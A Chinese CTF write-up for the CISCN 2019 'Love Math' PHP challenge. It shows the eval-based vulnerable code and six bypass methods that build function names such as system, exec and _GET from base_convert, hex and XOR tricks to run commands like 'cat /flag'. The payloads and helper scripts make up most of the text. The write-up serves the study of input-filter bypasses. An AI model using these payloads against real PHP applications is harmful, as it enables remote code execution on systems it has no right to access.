love_math学习

admin
admin
admin
102071
文章
87
评论
2022年1月6日01:44:34评论40 views字数 4224阅读14分4秒阅读模式

[CISCN 2019 初赛]Love Math

题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
 
<?php
error_reporting(0);
//听说你很喜欢数学,不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);  
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

题目限制了参数的长度要小于80,且不能包含空格、制表符、换行、单双引号、反引号、[]。并且输入的字符串需要为 $whitelist 中的函数

单双引号被禁止了,函数名提取字符串就无法实现,但是可以想办法从函数的返回结果中获取。

base_convert

1
2
3
4
5
6
7
 
<?php
echo base_convert('phpinfo', 36, 10);
echo "\n";
echo base_convert(55490343972,10,36);
//55490343972
//phpinfo
?>

方法一

使用php函数readfile等函数读取文件,但是需要flag.php中的.。
相关函数:

  • dechex 十进制转换为十六进制
  • hexdec 十六进制转换为十进制
  • hex2bin 转换十六进制字符串为二进制字符串
  • bin2hex 函数把包含数据的二进制字符串转换为十六进制值
  • pi作为变量是因为题目有长度限制,白名单中最短的就是这两个字符pi

这里获取.,借助dechex和hex2bin函数,不过hex2bin不在白名单里,还需用base_convert转换。

1
2
3
4
 
<?php
echo hex2bin(dechex(46));
//.
?>

最后payload

1
 
($pi=base_convert)(2146934604002,10,36)($pi(727432,10,36).$pi(37907361743,10,36)(dechex(46)).$pi(33037,10,36));

不过超出了长度限制

方法二

使用exec等命令执行nl /*读取文件。

1
2
3
4
5
6
7
8
9
10
11
 
<?php
echo base_convert('exec', 36, 20);
echo "\n";
echo base_convert('hex2bin', 36, 13);
echo "\n";
echo hexdec(bin2hex('nl /*'));
/*
47138
3761671484
474260451114
*/

最终payload

1
 
?c=($pi=base_convert)(47138,20,36)($pi(3761671484,13,36)(dechex(474260451114)))

不过这只能打印出同级目录文件下的flag,flag在其他位置就无法打印

方法三

刚开始我们知道可以异或出_。并且$没有被 waf,因此我们可以使用$_GET全局变量手动传入参数getshell。
虽然[]被过滤,我们依然可以使用{}来提取数组中的值。 

1
2
3
4
5
6
7
8
9
10
11
12
 
<?php
echo '1517'^'nrtc';
echo "\n";
echo base_convert('1517', 36, 10);
echo "\n";
echo base_convert('nrtc', 36, 10);

/*
_GET
53179
1109136
*/

最终payload

1
 
?0=system&amp;1=cat /flag&c=$pi=base_convert;$pi=$pi(53179,10,36)^$pi(1109136,10,36);${$pi}{0}(${$pi}{1})

方法四

就是用可用的函数和字母进行异或生成大量的字母组合(php中函数名默认为字符串),然后寻找可用的组合 

1
2
3
4
5
6
7
8
9
10
11
12
13
 
<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
    for($i = 0;$i < 9; $i++){
        for($j = 0;$j <9;$j++){
			for($a = 0;$a <=9;$a++){
            	$exp = $payload[$k] ^ $i.$j.$a;
            	echo($payload[$k]."^$i$j$a"."==>$exp");
            	echo "<br />";
            }
        }
    }
}

love_math学习
love_math学习
love_math学习
love_math学习
最终payload

1
2
 
?c=$pi=(is_infinite^(6).(4)).(rad2deg^(7).(5));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat%20/flag

方法五

如何构造出合适的base_convert进制转换

1
2
3
4
5
6
7
8
9
10
11
12
 
<?php
$a = 'hex2bin';
for($i = 2; $i < 37; $i++){
    for($j = 2; $j < 37; $j++){
        if(is_numeric(base_convert($a, $i, $j))){
            if(base_convert(base_convert($a, $i, $j), $j, $i) === $a){
                echo 'len='.strlen(base_convert($a, $i, $j)).' '.'base_convert参数->'.base_convert($a, $i, $j).' '.$j.' '.$i.' '."\n";
            }
        }
    }
}
?>

dechex的构造

1
2
3
4
5
6
7
8
 
<?php
$a = "_GET";
$num = hexdec(bin2hex($a));
echo $num . "\n";
echo (base_convert(3761671484,13,36)(dechex($num)));
//1598506324
//_GET
?>

paydload

1
 
?c=$pi=base_convert(3761671484,13,36)(dechex(1598506324));($$pi){1}(($$pi){2})&1=system&2=tac /flag

方法六

相关函数:

  • getallheaders:获取全部 HTTP 请求头信息
1
2
3
4
5
6
7
8
 
<?php
echo base_convert('exec', 36, 20);
echo "\n";
echo base_convert('getallheaders', 30, 10)

//47138
//8768397090111664438
?>
 
1
 
?c=$pi=base_convert,$pi(47138,20,36)($pi(8768397090111664438,10,30)(){1})

exec(getallheaders(){1}),可以获取请求头第一个字段的值,[]被waf可以用{}包囊数字来解决代替绕过中括号和引号
love_math学习
参考文章:

https://blog.csdn.net/qq_44657899/article/details/106104340
https://www.extrader.top/posts/a649e496
https://www.smi1e.top/%E5%9B%BD%E8%B5%9Blove_math%E9%A2%98%E8%A7%A3/

FROM :blog.cfyqy.com | Author:cfyqy

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日01:44:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   love_math学习https://cn-sec.com/archives/722526.html

发表评论

匿名网友 填写信息